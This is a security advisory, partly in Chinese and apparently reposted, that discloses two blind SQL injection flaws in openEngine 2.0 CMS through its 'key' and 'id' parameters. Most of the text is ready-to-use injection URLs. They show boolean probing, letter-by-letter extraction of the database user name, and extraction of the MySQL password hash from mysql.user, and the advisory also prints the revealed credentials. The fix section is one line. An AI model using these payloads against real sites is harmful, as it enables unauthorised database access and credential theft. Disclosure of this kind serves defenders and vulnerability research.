标题：openEngine 2.0 'key' Blind SQL Injection vulnerability
作者： Stefan Schurtz
影响程序：Successfully tested on openEngine 2.0 100226
开发者： http://www.openengine.de/
概述：
==========================
 
The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection
 
==================
技术分析
==================
 
# Database信息
User: easy
 
# 盲注：
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie m?chten die Seite versenden."
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie m?chten die Seite Homepage (de) versenden."
 
# User-Guessing
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121
 
=========
解决方案:
=========
 
针对性修复及过滤
 
 
标题: openEngine 2.0 'id' Blind SQL Injection
概述:
==========================
 
openEngine 2.0 含盲注缺陷
 
==================
技术分析:
==================
 
Database information
 
User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)
 
Blind SQL Injection
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1
AND ('a'='a&key= <- error
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0
AND ('a'='a&key= <- no error
 
User-Guessing
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND ('a'='a
<- error (e)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND ('a'='a <-
error (a)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND ('a'='a
<- error (s)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND ('a'='a
<- error (y)
 
Password(Hash)-Guessing
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1)) = 42 AND
('a'='a <- error (*)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),2,1)) = 69 AND
('a'='a <- error (E)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),3,1)) = 56 AND
('a'='a <- error (8)
... and so on
 
=========
Solution:
=========
针对性修复及过滤